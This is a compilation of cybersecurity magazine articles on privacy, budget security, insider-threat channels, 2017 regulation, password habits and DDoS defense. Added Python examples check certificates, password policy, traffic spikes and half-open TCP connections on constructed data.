there is no immediate cost, it becomes hard to quantify and understand, and even hard to
predict the potential outcomes.

Unfortunately, until you feel the pain of a privacy loss, it has a zero cost. I'm consistently
surprised by the kinds of privacy tradeoffs people are making online. They don't really seem to
realize what they are giving up, and until we get to a point where public policy and technology
can help us see and understand the immediate costs of giving up our privacy, we will continue
to undermine ourselves.

About The Author

I am a Distinguished Professor in the School of Electrical Engineering and
Computer Science at Pennsylvania State University and a fellow of both IEEE
and ACM. I am also the Director of the Institute for Networking and Security
Research (INSR), a research institute focused on the study of networking and
security in diverse computing environments.

This Q&A was conducted by the Association for Computing Machinery
(ACM). For more than 50 years, the ACM Turing Award has been recognized
as the most prestigious technical award in the computing industry. In recognition of that
milestone, ACM has conducted Q&As with industry thought leaders to highlight important trends
and topics in the computing industry. More information on the ACM Turing Award may be found
at www.acm.org/turing-award-50

Improve Company Cyber Security While Staying on Budget

Cyber security is a critical issue for any business owner, and modern businesses face an ever-
evolving threat when it comes to keeping themselves and their customers protected. In fact,
studies project that cybercrime could cost businesses a staggering two trillion dollars by the
year 2019. It's become a digital epidemic, and businesses that aren't properly prepared leave
themselves open to dire consequences. Fortunately, you don't need the million-dollar budget of
an international corporation in order to stay protected. Implementing the common-sense tips
below will go a long way toward boosting your business' cyber security no matter your budget.

Stay Ahead of the Threat

The digital space is constantly growing and evolving, and so too are the risks to your business.
For that reason, effective cyber security protection requires sustained watchfulness and effort.
To keep your data protected, you need to stay ahead of the situation by always striving to
identify new threats, seek out both digital and physical vulnerabilities in your security systems
and be aware of the various motivations a hacker might have for targeting your business.
Studies have indicated that it takes an average of four months for companies to identify and fix
security vulnerabilities, which is simply far too long. Keep your company ahead of the curve
through constant vigilance.

Budget Wisely

Quality cyber security can be an expensive proposition, and many small businesses are
tempted to make cuts to their budget in order to save costs. Don't let your company be one of
them. While reducing your security budget may result in a short-term gain, it could put your
business and its customers at tremendous risk. Instead, review your budget and seek ways to
use the money more efficiently rather than cutting it entirely. Another financial consideration is
choosing the right business credit card. Business credit cards are popular targets for criminals,
so be sure to look for cards that offer advanced fraud protection features.

Implement Security Protocols

The greatest vulnerability in your cyber security system likely has nothing to do with your
hardware or software - it's the people who use them. In order to ensure the highest level of
protection, make sure that you've developed and implemented a policy of cyber security best
practices.

By training your employees in security best practices, you'll give them the tools they need to
identify potential threats and respond to them appropriately. Also keep in mind that this needs to
be an ongoing effort, with periodic refreshers to help employees stay up to date on the latest
threats and security measures.

Use the Cloud

Cloud storage is an excellent way to keep your company's data safe and secure, and it can also
simplify storage and sharing for your employees. If you're considering a move to the cloud,
however, it's critical that you choose an appropriate platform. Use a solution intended
specifically for businesses and ensure that they offer standard features like firewalls, multifactor
authentication and data encryption services. Don't be afraid to ask questions about where and
how your data will be stored, who will have access to it and whether the provider conducts
routine security audits. Your data is extremely valuable, so it pays to do your due diligence to
make sure you identify the best cloud provider for your needs.

Keep Your Software Updated

From antivirus software to cloud storage apps and web browsers, it's critical that any software
your business uses is kept up to date. Security exploits are being constantly identified and
patched, but you won't be able to take advantage of these protections if your software isn't
routinely updated to the newest stable versions. Automatic updates are useful but may not work
quickly enough, so incorporate routine update checks into your security protocols. If support for
any of your software is ever discontinued, consider switching to an alternative as quickly as you
can. Remember that, when it comes to digital security, time is rarely on your side.

Use the Tools at Your Disposal

If you're working under a tight cyber security budget, one way to improve your security is by
making use of all the tools at your disposal. In particular, SSL optimization tools can help you
manage your security more effectively without straining your budget or overtaxing yourself. A
certificate checker can automatically detect all of the SSL certificates that are active on your
network, reviewing them and providing useful reports on their health and status. Similarly, a
certificate monitoring tool can allow you or your admin to detect any suspicious activity and
prevent unauthorized SSL issuance. Best of all, these tools can often be found for free and are
quick and easy to use.
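Both of the tools just described can be reduced to a small set of rules run over an inventory. The following is an added example, not code from the article or from any particular product: it reviews a constructed certificate inventory (the records a scanner would collect from each listening service) for expiry, weak signature algorithms, short keys, name mismatches and unexpected issuers, and then cross-checks constructed Certificate Transparency log entries against the same inventory to surface certificates issued for the company's domain by a CA that was never authorized. The issuer allowlist, the domain name and the fixed "today" are assumptions made for the example.

```python
from datetime import datetime, timedelta, timezone

# Fixed "today" so the report is reproducible; a real run would use datetime.now(timezone.utc).
NOW = datetime(2017, 3, 15, tzinfo=timezone.utc)

# Constructed inventory (not real certificates). A scanner would fill this in from the
# certificates it finds on each listening service; only the fields the rules need are kept.
INVENTORY = [
    {"host": "www.example.invalid", "sans": ["www.example.invalid", "example.invalid"],
     "issuer": "Example Trusted CA", "not_after": "2017-04-01",
     "sig_alg": "sha256WithRSAEncryption", "key_bits": 2048},
    {"host": "mail.example.invalid", "sans": ["mail.example.invalid"],
     "issuer": "Example Trusted CA", "not_after": "2018-03-01",
     "sig_alg": "sha1WithRSAEncryption", "key_bits": 1024},
    {"host": "intranet.example.invalid", "sans": ["old.example.invalid"],
     "issuer": "intranet.example.invalid", "not_after": "2017-01-01",   # self-signed
     "sig_alg": "sha256WithRSAEncryption", "key_bits": 2048},
]

# Issuers our policy allows to issue for our domain (assumption for the example).
AUTHORIZED_ISSUERS = {"Example Trusted CA"}
OUR_DOMAIN = "example.invalid"

# Constructed Certificate Transparency entries (not real log data): one record per
# certificate seen in a public CT log, as a monitoring service would deliver them.
CT_ENTRIES = [
    {"domain": "www.example.invalid", "issuer": "Example Trusted CA", "logged": "2017-02-20"},
    {"domain": "vpn.example.invalid", "issuer": "Some Other CA", "logged": "2017-03-10"},
    {"domain": "www.unrelated.invalid", "issuer": "Some Other CA", "logged": "2017-03-11"},
]


def _parse_date(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d").replace(tzinfo=timezone.utc)


def _in_our_domain(name: str) -> bool:
    return name == OUR_DOMAIN or name.endswith("." + OUR_DOMAIN)


def check_certificate(cert: dict, now: datetime = NOW, warn_days: int = 30) -> list:
    """Health findings for one certificate record; an empty list means it looks fine."""
    findings = []
    not_after = _parse_date(cert["not_after"])
    if not_after < now:
        findings.append("expired")
    elif not_after - now < timedelta(days=warn_days):
        findings.append("expires_within_%dd" % warn_days)
    if cert["sig_alg"].lower().startswith(("md5", "sha1")):
        findings.append("weak_signature")    # browsers stopped trusting SHA-1 signatures
    if cert["key_bits"] < 2048:
        findings.append("weak_key")
    if cert["host"] not in cert["sans"]:
        findings.append("name_mismatch")     # clients refuse it, or users learn to click through
    if cert["issuer"] not in AUTHORIZED_ISSUERS:
        findings.append("unauthorized_issuer")
    return findings


def health_report(inventory, now: datetime = NOW) -> dict:
    """Map each host to its findings, so a weekly report can be diffed against the last one."""
    return {c["host"]: check_certificate(c, now) for c in inventory}


def suspicious_issuance(entries, inventory) -> list:
    """CT entries for our domain that no authorized CA issued, or that we never deployed."""
    deployed = {c["host"] for c in inventory}
    return [e for e in entries
            if _in_our_domain(e["domain"])
            and (e["issuer"] not in AUTHORIZED_ISSUERS or e["domain"] not in deployed)]


if __name__ == "__main__":
    for host, findings in health_report(INVENTORY).items():
        print(host, findings or "ok")
    for entry in suspicious_issuance(CT_ENTRIES, INVENTORY):
        print("unexpected certificate:", entry)
```

The CT cross-check is the detection half of "preventing unauthorized issuance"; the prevention half is a CAA DNS record naming the same authorized CAs, which this example assumes is in place but does not manage.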

Cybercrime has become one of the primary threats facing today's businesses, and your
company is not immune no matter its size. The threat is constantly evolving, and addressing the
problem requires vigilance and active engagement. To keep your business and its customers
safe without overextending your security budget, ensure that you've implemented the simple,
affordable steps above.

About the Author

Maricel Tabalba is a freelance contributor for Credit.com who is interested in writing about
personal finance advice for Millennials and college students. She earned her Bachelor of Arts in
English with a minor in Communication from the University of Illinois at Chicago.

The information sharing methods

By Milica D. Djekic

Information can be shared through many different means, and here we discuss how it can leak
out of an organization through insider threat sources. Insider threats are those people within
your business who are willing to release confidential information to a criminal or terrorist
network outside it.

They may spy on the rest of the enterprise or even steal valuable objects from it and take them
out to their contacts. In this article, we analyze which methods of information sharing are most
typical of a modern business environment.

Here we describe how information can be stolen from an organization. It's important to know
that in the case of a cyberspace operation, plenty of social engineering tactics can be used. The
methods are as follows:

E-mail correspondence: Much confidential information can be stolen and forwarded to an
external threat using email accounts. This method can be classified as quite old-fashioned,
because the majority of police forces are trained to check that communication line.

In order to trick the authorities, the threats use their private accounts and try to appear as
harmless as possible at work. Luckily, even those cases are resolvable by the majority of police
forces.

Skype communication: A large amount of critical information can leak out through the Skype
messenger. The insider threat can use a private Skype account or add a private contact to
Skype for Business. Since staff spending their working hours in the office are expected to be
online on Skype, it is logical that the insider threat would simply add a private contact. This
scenario is well known to the authorities, so it is not that hard to resolve such a case.

Darknet communication: Professional threats usually maintain their communication and
exchange information using some of the Darknet systems. It is not rare for a threat to create
several Darknet accounts in order to make the investigation much harder for the authorities.
The security challenges also use fake identities and commonly share information through
Darknet e-mails, chat services, forums, discussion groups and so on. We believe that modern
authorities can cope even with this scenario, because it is something met in practice so often.

Mobile technologies: In some cases, the threats rely on mobile technologies and use phone
calls, text messages or web applications to exchange information. In any case, they leave a
trace, so this kind of case has a good chance of being resolved.

Hacker support: Quite commonly, insider threats deal with hacker support. It is well known that
hackers can steal information from any computer very secretly, but sometimes they need the
assistance of people inside the organization. This scenario begins as a usual phishing
campaign: some of the employees click on a suspicious link and make the entire network visible
to the hackers.

In the majority of cases, the computers within a network do not hold the valuable data, so some
of the local criminals track a potential target and make contact in order to recruit that person to
serve as an insider threat. Today's hacker tools come with a remote administration option, so
the insider threat can receive instructions directly on their screen, either as a chat message or
as a skillfully prepared file. This sort of scenario also leaves a trace, so we believe that modern
authorities can cope with such a case.

Meetings in person: Sometimes insider threats arrange to meet in person with their criminal or
terrorist contacts in order to talk to them directly or hand over something valuable. This type of
scenario can also be discovered and proved, because the bad guys carry their cell phones and
leave some sort of route that can be traced.

This article describes some of the typical cases present in modern criminology and how those
examples can be handled in practice. We hope there will be more research attempts that
investigate this topic more deeply.

About The Author

Since Milica Djekic graduated from the Department of Control Engineering at the
University of Belgrade, Serbia, she's been an engineer with a passion for
cryptography, cyber security, and wireless systems. Milica is a researcher
from Subotica, Serbia. She also serves as a Reviewer at the Journal of
Computer Sciences and Applications and.

She writes for American and Asia-Pacific security magazines. She is a volunteer with the
American corner of Subotica as well as a lecturer with the local engineering society.

Cybersecurity Regulations in 2017
The Enterprise View
By Tom Gilheany, Product Manager, Learning@Cisco

2016 was a big year in cybersecurity news, and not in a good way.

The world experienced about 3,000 publicly disclosed data breaches in 2016. That exposed
about 2.2 billion records. Yahoo made headlines for experiencing the largest hack in history.
That has Verizon reconsidering its offer price for the search and media giant.

Distributed denial of service attacks illustrated the security risk involved with connected devices.
These attacks also demonstrated how Internet of Things devices can be enlisted and repurposed
for malicious use: taken over for ransomware, remotely controlled, or used to exfiltrate data.

Ransomware became even more prevalent last year too. A Deloitte 2016 report indicated that in
the first quarter of last year alone there was an average of more than 4,000 attacks per day.
That was a 300 percent increase from the 1,000 ransomware attacks observed on average per
day in 2015. And then there was the U.S. presidential election. Cybersecurity, or the lack of it,
was center stage for that as well.

That included the hacking of the Democratic National Committee during the 2016 election
campaign. Then, in January, the Office of the Director of National Intelligence published a report
that said Russian President Vladimir Putin ordered an influence campaign in 2016 aimed at the
U.S. presidential election with a goal to undermine public faith in the U.S. democratic process,
denigrate Secretary Clinton, and harm her electability and potential presidency. This report
suggested the Russians did so using covert intelligence operations, including cyberactivity, in an
effort to impact election results.

Whatever you think of all that, the developments noted above make clear that our incoming
president and other politicians this year will be challenged by and likely pushed to respond to
the problem that is hacking.

Of course, cybersecurity already has been the subject of significant discussion in business,
government, and personal privacy circles.

Recent developments

During his administration, President Obama passed the Cybersecurity Act of 2015. That aimed
to create a framework for the voluntary sharing of cyberthreat information between private
entities and the federal government, as well as within agencies of the federal government.

In December 2016, a year after that law went into effect, the Obama administration's
Commission on Enhancing National Cybersecurity released its Report on Securing and
Growing the Digital Economy. It identifies cybersecurity gaps and how to address them.

But those problems and prescriptions are pretty general. For example, it talks about the need for
collaboration between the federal government and the private sector. It suggests the next
administration should develop concrete efforts to strengthen the cybersecurity of small and
medium-sized businesses.

Now the incoming administration has the opportunity to add some meat to these bones. And it
should probably start work on that sooner rather than later. Business leaders and their teams
should do the same.

Here's why.

Getting a head start on cyber

Forrester predicts that within 100 days the new U.S. president will face a major cybercrisis. In its
October 2016 paper "2017 Predictions: Dynamics That Will Shape The Future In The Age of the
Customer," the research and consulting firm also says that this year a Fortune 1000 company
will fail because of a cyberbreach. Ed Amoroso, AT&T's recently retired chief security officer,
late last year offered a similarly dire prediction.

"I believe that during the next presidential administration, we are going to see a massive
cyberattack on infrastructure," said Amoroso. "I believe it is going to be of devastating
proportions, and I think we are not ready for it." Part of the problem is the lack of laws and
regulations on this front. But cyberattacks have become high visibility events. That, and the fact
that moving cybersecurity legislation forward could help politicians move their careers forward in
the process, indicates there's likely to be much more concrete action on the cybersecurity
regulatory front in the near future.

Cyber laws in 2017

Such laws are already in the works or have been enacted in Australia and Europe, as well as at
the state level in the U.S.

Australia has developed a national strategy through which government and the private sector
are working together to address cybersecurity. Last year it issued a white paper describing
major risks and initiatives on this front. And a few years ago it created the Australian Cyber
Security Centre, an initiative to make the country's networks harder to compromise.

Last summer the European Union approved cybersecurity rules that force businesses to
strengthen their defenses. They require banking, energy, and major tech companies to report
attacks. And they talk about how EU nations must cooperate on network security matters.
Meanwhile, cybersecurity legislation was introduced or considered in at least 28 U.S. states last
year. And 15 states enacted such laws in 2016, according to The National Conference of State
Legislatures.

Most of these laws and bills address national infrastructure and governmental agencies. But
some of these laws specifically target the interests of businesses. For example, one of the three
cybersecurity bills signed into law in California last year was S.B. 1137. It makes it a crime for a
person to knowingly introduce ransomware into any computer, computer system, or computer
network.

Colorado's H.B. 1453 calls for the creation of a state cybersecurity council to provide policy
guidance to the governor. That council will also coordinate with the general assembly and the
judicial branch regarding cybersecurity. Utah H.B. 241, which the governor signed in March of
2016, enacts civil penalties for hackers. And Washington state's H.B. 2375, which the governor
signed in April of 2016, establishes the State Cybercrime Act.

Looking ahead

Of course, the incoming presidential administration in the U.S. is not expected to be heavy
handed with regulations. However, the high-profile subject of cybersecurity could be the
exception. That said, organizations with a stake in cybersecurity and related regulations--which
is to say most organizations--need to be ready for what's happening on that front.

Businesses that aren't already involved in the cybersecurity discussion may want to start voicing
their opinions and offering a hand on these efforts now, before cybersecurity regulatory
decisions are cemented.

At the same time, businesses should keep in mind that regulations typically lag technology by
three to four years. That means businesses need to go beyond simply complying with
cybersecurity regulations. They need to take additional steps to ensure their organizations are
as secure as their risk assessments suggest they need to be.

About Tom Gilheany

Tom Gilheany is Cisco's Product Manager for Security Training and
Certifications. He has a diverse background in startups through
multinational Fortune 100 companies. Combining over 20 years of product
management and technical marketing positions, and over a dozen years in
IT and Operations, he has conducted nearly 50 product launches in
emerging technologies, cybersecurity, and telecommunications. Tom holds
a CISSP, an MBA, and is an active board member of the Silicon Valley
Product Management Association and Product Camp Silicon Valley.

Password security: It's like sellotaping your house key to the
front door...
by Jonathan Stock, Cyber Security Recruitment Consultant, IntaPeople.

Last month we saw Barack Obama's final mic drop as President, Kim Kardashian's finally stable
and secure enough to get back into her social network game, and there's enjoyment all around
our office over the first instalment of the TV series Spies, watching people dropped into a
cybersecurity seminar come up with backstories as to why they were there and who they were.
Yet the same stories keep popping up within the cybersecurity industry.

On the radio this morning I heard another advert promoting individuals to be cyber aware; to be
concerned about malware, to not bow down to ransomware attacks. Great news, everyone is
taking notice of cybersecurity.

The industry's mission to educate everyone is taking shape. And then, I read an article this
morning about the most common passwords of 2016, and of course, there are some massive
issues.

Can you guess what the most used password was for 2016? The one used by nearly 1 in 5
people? The same one as 2015: 123456. That's right, 123456. Hello face, here's my palm!

Then there's the rest of them: QWERTY, 111111, password; the list goes on in a similar vein
(my favourite of all of them was google).

It amazed me that in this day and age, when we are bombarded with news articles about
hackers stealing your personal data, there's still not a greater effort by individuals to make
themselves as secure as possible.

As mentioned within the article, the whole fault can't be put at the feet of the individual; the
websites involved should also be accountable. Their responsibility is to make it as difficult as
possible for hackers to access their data.

They can make their infrastructure more robust and their defences better able to deal with
attacks, but they should also enforce more complex password policies. Yes, the companies
involved in data breaches are held accountable.

They are fined, exposed in the media and soon, when GDPR pops up, they are going to be
regulated more and more.

Surely it would be better for all companies to enforce strong password best practice, then, if
hackers do get in, maybe it would be slightly more difficult for them to get into customer
accounts.

We hear all the time that hacks are getting easier and easier, that they can attack multiple
companies at once and more sensitive data is being breached.

It's easy to change your password to something trickier and to change it regularly, on a monthly
basis; all it takes is the desire to do so. I can't see it being very difficult to change your password
to PaS5w0rD!&* and once you have typed the password 10 times, you are going to remember it.
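A server-side check of the kind the article asks websites to enforce, added here as an example and not the article's or IntaPeople's code: it rejects the common passwords the article names and, by undoing simple character substitutions, also catches variants such as PaS5w0rD!&*, which cracking wordlists try routinely. The 12-character minimum and the substitution table are assumptions.

```python
"""Password-policy check: blocklist of common passwords plus substitution-variant detection.

Added example, not from the article. The blocklist holds the passwords the
article names; a real deployment would use a large breached-password list.
The minimum length and the LEET_MAP table are assumptions.
"""
import re

# The commonly used passwords the article names (lower-cased).
COMMON_PASSWORDS = {"123456", "qwerty", "111111", "password", "google"}

# Assumed substitution table, undone before comparing, because cracking
# wordlists apply exactly these substitutions as a matter of routine.
LEET_MAP = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                          "5": "s", "7": "t", "@": "a", "$": "s"})

MIN_LENGTH = 12  # assumption


def normalise(password: str) -> str:
    """Lower-case, undo substitutions, drop symbols: 'PaS5w0rD!&*' -> 'password'."""
    text = password.lower().translate(LEET_MAP)
    return re.sub(r"[^a-z0-9]", "", text)


def check_password(password: str) -> list:
    """Return the policy violations found; an empty list means the password is accepted."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")

    lowered = password.lower()
    if lowered in COMMON_PASSWORDS:
        problems.append("is one of the most common passwords")
        return problems

    norm = normalise(password)
    candidates = (
        re.sub(r"[^a-z]+$", "", lowered),  # 'qwerty2016' -> 'qwerty'
        norm,                               # 'PaS5w0rD!&*' -> 'password'
        norm.rstrip("0123456789"),          # 'passw0rd99' -> 'password'
    )
    for candidate in candidates:
        if candidate in COMMON_PASSWORDS:
            problems.append(f"is a variant of the common password '{candidate}'")
            break
    return problems


if __name__ == "__main__":
    for pw in ("123456", "PaS5w0rD!&*", "Qwerty2016", "correct horse battery staple"):
        verdict = check_password(pw)
        print(f"{pw!r}: {'accepted' if not verdict else '; '.join(verdict)}")
```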

Ultimately, a slight change makes things harder for hackers, keeps you more secure and helps
you to become more cyber aware.

It's been said many times before that cybersecurity is a combination of products and processes.

You can have the best firewalls, the best anti-virus software but if you are not committing to the
processes and best practices, then ultimately, you are going to be found out and those pesky
little hackers are going to get in.

About The Author

My name is Jonathan Stock and I am a cybersecurity recruitment consultant working for
IntaPeople. In addition to sourcing candidates for various cybersecurity companies, I am also a
contributor to several cybersecurity online magazines, a member of the UK Cyber Security
Cluster and an event coordinator.

Jonathan can be reached online at j.stock@intapeople.com, @JonathanStock86 and at our
company website http://www.intapeople.com

14 Unique Ways to Protect Yourself from DDoS Attacks
by Todd Reagor, CEO of Rivalhost

If your website goes down due to an overload of website traffic, you're probably a victim of the
notorious distributed denial of service (DDoS) attack. DDoS attacks have become a nightmare
for companies with an active online presence. From BBC to Twitter and from Donald Trump's
website to Netflix, 2016 saw some of the most unprecedented cyber attacks in the history of the
internet.


In the ever-changing world of high-tech gadgets and the rising popularity of the Internet of Things,
DDoS attacks have increased 2.5 times over the last 3 years, and are expected to become
increasingly frequent in the coming years.

Furthermore, according to a report by Cisco in 2016, the average size of a DDoS attack is growing
and approaching 1Gbps, which is enough to take a large business offline. Globally, DDoS
attacks grew by 25% in 2015 and are likely to increase by 260% by 2020.

From monetary to brand value, DDoS attacks drastically affect every part of the business. The
cost a business can incur from a DDoS attack ranges up to $20,000, and the airline Virgin Blue
lost $20 million in an IT outage that lasted for 11 days in 2010.

Today, businesses need to tighten their seat belts to work and land safely in the highly
advanced internet world. Here are 15 unique ways to protect yourself from DDoS attacks.

1. Create an Action Plan in Advance

Why wait for a DDoS attack to ruin your business? Intelligence is in responding to the potential
attacks before they happen.

Focus on creating a system that absorbs a potential DDoS attack. Though creating an action
plan in advance is not a 100% foolproof way of DDoS protection, it does help in mitigating the risk
to a great extent.

An action plan might consist of the following items:

Use sensors that send an alert whenever the website is down.
In case of any malicious activity, dump the logs quickly.
Consider contacting your ISP to learn about its free and paid DDoS protection plans.
Confirm the DNS TTL (time-to-live) for systems that could be attacked in the future.
Document your IT infrastructure and create a network topology diagram with an asset inventory.
Purchase DDoS protection products to mitigate the monetary loss due to the attacks.

An action plan comes in handy when your website is under attack because it would reduce the
extent of damage caused by the hackers.

2. Monitor Traffic Levels

A DDoS attack brings an unprecedented amount of traffic to your server, which spikes the traffic
beyond your imagination.

In fact, an ideal time for any hacker to strike is when your website is likely to see a huge
amount of traffic, such as Thanksgiving or Christmas. Attack traffic mixes with the genuine traffic
and overloads the server with an unprecedented volume, which eventually crashes the server.

Therefore, the best way to quickly notice a DDoS attack is to look out for abnormal traffic
increase to your website. If you expect 500 visitors per 10 minutes, an influx of 4000 visitors per
minute should trigger an alert.

Staying alert, monitoring the traffic and setting threshold limits when traffic goes beyond a
certain level will help you in DDoS protection.
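A sliding-window rate alert for the threshold described above, added here as an example rather than taken from the article or RivalHost. The log lines are constructed, and the alert threshold (ten times the expected per-minute load, i.e. 500 per minute against the article's 50) is an assumption.

```python
"""Sliding-window request-rate alert over access-log style lines.

Added example, not from the article. Each constructed log line starts with an
ISO timestamp followed by a client address and request; only the timestamp is
used. The threshold multiplier is an assumption.
"""
from collections import deque
from datetime import datetime, timedelta

EXPECTED_PER_MIN = 500 // 10        # the article's 500 visitors per 10 minutes
ALERT_MULTIPLIER = 10               # assumption: alert at 10x the expected load
THRESHOLD_PER_MIN = EXPECTED_PER_MIN * ALERT_MULTIPLIER   # 500 requests per minute
WINDOW = timedelta(minutes=1)


def parse_timestamp(line: str) -> datetime:
    """Extract the ISO timestamp that starts each log line."""
    return datetime.fromisoformat(line.split(" ", 1)[0])


def rate_alerts(lines, window=WINDOW, threshold=THRESHOLD_PER_MIN):
    """Return (time, count) for each point where the sliding window first exceeds threshold.

    One alert is raised when the count crosses the threshold and none again
    until the rate has dropped back below it, so a sustained flood yields a
    single alert rather than one per request.
    """
    recent = deque()          # timestamps inside the current window, oldest first
    alerts = []
    alarmed = False
    for line in lines:
        t = parse_timestamp(line)
        recent.append(t)
        while recent and t - recent[0] >= window:   # keep (t - window, t]
            recent.popleft()
        if len(recent) > threshold:
            if not alarmed:
                alerts.append((t, len(recent)))
                alarmed = True
        else:
            alarmed = False
    return alerts


def constructed_log(burst: bool):
    """Constructed traffic: 500 requests over 10 minutes, then optionally 4000 in one minute."""
    start = datetime(2017, 3, 1, 10, 0, 0)
    lines = []
    # Baseline: one request every 1.2 s, i.e. 50 per minute, 500 per 10 minutes.
    for i in range(500):
        t = start + timedelta(seconds=1.2 * i)
        lines.append(f"{t.isoformat()} 198.51.100.{i % 200 + 1} GET /")
    if burst:
        # Flood: 4000 requests spread evenly over the following minute.
        burst_start = start + timedelta(minutes=10)
        for i in range(4000):
            t = burst_start + timedelta(seconds=60 * i / 4000)
            lines.append(f"{t.isoformat()} 203.0.113.{i % 250 + 1} GET /")
    return lines


if __name__ == "__main__":
    print("normal traffic:", rate_alerts(constructed_log(False)))
    print("flood traffic: ", rate_alerts(constructed_log(True)))
```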

3. Pay Attention to Connected Devices

The Internet of Things is the latest buzz and a growing topic of conversation both in the workplace
and outside. From wearables to retail, healthcare to agriculture, IoT is making an impact in
every sector, but even this burgeoning technology is not spared by attackers.

Hackers find their way through these connected devices to disrupt the services of a brand.

Paying special attention to the connected devices will help you weather a DDoS attack.
For stronger DDoS protection, change the passwords of the devices regularly, switch off the
devices when not in use and verify every device before connecting it.

Until the procession begins, focus on mitigating the threats to protect the connected device and
your server.

4. Ensure You Have Extra Bandwidth

It makes sense to have more bandwidth than you would plausibly need because
overprovisioning your bandwidth provides extra time to identify and deal with the attack.

It also enables the server to accommodate unprecedented spikes in traffic and to some extent
lowers the intensity of the attack.

If you overprovision the bandwidth by 200 percent or 600 percent, it will not stop the DDoS
attack, but it will buy you crucial time before your resources are overwhelmed.

Therefore, when determining the requirement of bandwidth give your business a healthy margin
of error to mitigate the risk of cyberattacks.

5. Train Your Customers On Security

An informed and trained customer is an asset to your business, as they walk with you hand-in-
hand for higher DDoS protection.

Explain to the customers the necessity and dire need of safeguarding their systems because
hackers target computers with weak passwords.

Gone are those days when birthdate or family name was considered as a strong password for a
computer. Urge your customers to keep difficult passwords to protect their privacy.

Furthermore, educate the clients to skip any attachments received from email addresses they
dont recognize.

Today, customer education is an essential component of any companys strategy for DDoS
protection. To proactively guard the customers against such cyber bullies, encourage them to
review and follow best practices to secure their device.

6. Set up Secured VPS Hosting

In order to save a few dollars, many businesses opt for the lowest-priced hosting plans available
on the market. While the initial cost is low, the exposure to DDoS attacks is high. Setting up
secured VPS hosting provides DDoS protection and reduces the probability of an attack.

With a secured VPS, your website has its own partitioned space, unique IP address and
operating system, thereby isolating the site from cyberattacks.

Furthermore, secured VPS hosting provides full console access, which helps in eliminating
potential malware.

In short, DDoS secured VPS hosting takes away the headache and makes use of the latest
technology to put your website in the driving seat.

7. Drop Packets from Obvious Sources of Attack

DDoS attacks have the potential to create havoc for your business, and you need to stop traffic
from false sources at any cost. Use an access list at the perimeter of the network to
block malicious activity. Furthermore, instruct the router to drop packets from IPs that are
obvious sources of attack. You can also rate limit your router to add another layer of protection.

Again, with the increasing size of online attack, this strategy will only buy time and delay the
ramping up of the threat.

8. Purchase a Dedicated Server

Purchasing a dedicated hosting server will provide you with more bandwidth, control over
security, and countless resources. With a dedicated server as your first layer of defense, you
can successfully run your online site with thousands of legitimate customers without worrying
about anything. Undoubtedly, dedicated servers are expensive, but the benefits clearly outweigh
any monetary issue you face due to lack of DDoS protection.

Our DDoS protected dedicated servers provide DDoS protection of 20 Gbps with a bandwidth of
10 terabytes. We manage 100% of the server operation, giving you room to focus on other
important business aspects.

9. Block Spoofed IP Addresses

Things are not always what they seem; the first appearance deceives many.
-Phaedrus

These words hold true, especially for IP address spoofing. For those of you who are new to the
word spoofing, in simple English it means presenting the wrong facts in a decorated
manner. Unchecked IP address forgery enables harmful DDoS attacks, and you need to focus
on the following tips to stop IP address spoofing.

Create an access control list (ACL) to deny all inbound traffic with a particular source IP.
Use reverse path forwarding (RPF) checks, also known as IP verify; they work similarly to an anti-spam solution.
Filter both outbound and inbound traffic to enhance DDoS protection.
Configure your switches and routers so that they automatically reject packets arriving from outside your network that claim an internal source address.
Encrypt sessions to your router so that only trusted hosts outside your network are allowed in.

10. Install Patches and Updates Frequently

Installing updates on open source platforms like WordPress as soon as possible mitigates the
risk of attack because the update closes the security hole. Therefore, deploy
an update within your network as soon as possible.

The longer the lag time between the release of the update and its application, the more vulnerable your
system becomes.

This is often neglected by many businesses, mainly because of the frequency of updates, and
they consider updating the application unimportant.

11. Aggressively Monitor Half-Open Connections

In a normal TCP three-way handshake:

The client requests a connection by sending a SYN (synchronize) packet to the server,
The server returns a SYN-ACK (synchronize-acknowledge) packet to the client,
The client answers with an ACK (acknowledge) confirming that the packet was received, and
communication begins.

In a half-open connection the final ACK never arrives. A hostile client sends multiple connection
requests to the server's ports using fake IP addresses, so the server's SYN-ACK packets go to
addresses that never answer. Such connections are not closed and remain open, consuming
server resources and leaving it vulnerable to attack.

Detection of such half-open connections is done by:

Adding an empty keepalive message to the application protocol framing
Adding a null keepalive message to the actual application protocol framing
Using an explicit timer
Altering the TCP keepalive settings
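A per-port count of half-open (SYN-RECV) connections taken from socket-table output, added as an example and not the article's or RivalHost's tooling. The table below is constructed in the column layout of `ss -tan`, and the thresholds are assumptions; the distinct-peer count is included because a spoofed-source flood shows many peers with one half-open connection each.

```python
"""Summarise half-open TCP connections per listening port from `ss -tan` style output.

Added example, not from the article. SAMPLE_SS_OUTPUT is constructed; on a real
host the live output of `ss -tan` would be fed in instead. Thresholds are assumptions.
"""
from collections import defaultdict

# Constructed socket table in the column layout of `ss -tan`.
SAMPLE_SS_OUTPUT = """\
State      Recv-Q Send-Q Local Address:Port   Peer Address:Port
LISTEN     0      128    0.0.0.0:443          0.0.0.0:*
ESTAB      0      0      10.0.0.5:443         198.51.100.7:51234
ESTAB      0      0      10.0.0.5:443         198.51.100.8:51235
SYN-RECV   0      0      10.0.0.5:443         203.0.113.9:40001
SYN-RECV   0      0      10.0.0.5:443         203.0.113.10:40002
SYN-RECV   0      0      10.0.0.5:443         203.0.113.11:40003
SYN-RECV   0      0      10.0.0.5:443         203.0.113.12:40004
SYN-RECV   0      0      10.0.0.5:80          203.0.113.13:40005
"""


def parse_sockets(text):
    """Return (state, local_port, peer_ip) for each data row; the header row is skipped."""
    rows = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 5:
            continue
        state, local, peer = fields[0], fields[3], fields[4]
        local_port = int(local.rsplit(":", 1)[1])
        peer_ip = peer.rsplit(":", 1)[0]
        rows.append((state, local_port, peer_ip))
    return rows


def half_open_summary(text):
    """Per port: number of half-open and established connections and distinct half-open peers."""
    acc = defaultdict(lambda: {"half_open": 0, "established": 0, "peers": set()})
    for state, port, peer in parse_sockets(text):
        if state == "SYN-RECV":            # SYN received, SYN-ACK sent, final ACK missing
            acc[port]["half_open"] += 1
            acc[port]["peers"].add(peer)
        elif state == "ESTAB":
            acc[port]["established"] += 1
    return {
        port: {"half_open": s["half_open"],
               "established": s["established"],
               "distinct_peers": len(s["peers"])}
        for port, s in acc.items()
    }


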